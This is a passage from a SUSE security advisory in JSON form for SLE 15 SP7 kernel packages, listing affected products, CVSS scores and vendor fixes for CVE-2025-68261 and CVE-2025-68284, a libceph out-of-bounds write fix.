"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68261",
"url": "https://www.suse.com/security/cve/CVE-2025-68261"
},
{
"category": "external",
"summary": "SUSE Bug 1255164 for CVE-2025-68261",
"url": "https://bugzilla.suse.com/1255164"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68261"
},
{
"cve": "CVE-2025-68284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds writes in handle_auth_session_key()\n\nThe len field originates from untrusted network packets. Boundary\nchecks have been added to prevent potential out-of-bounds writes when\ndecrypting the connection secret or processing service tickets.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68284",
"url": "https://www.suse.com/security/cve/CVE-2025-68284"
},
{
"category": "external",
"summary": "SUSE Bug 1255377 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "external",
"summary": "SUSE Bug 1255378 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255378"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
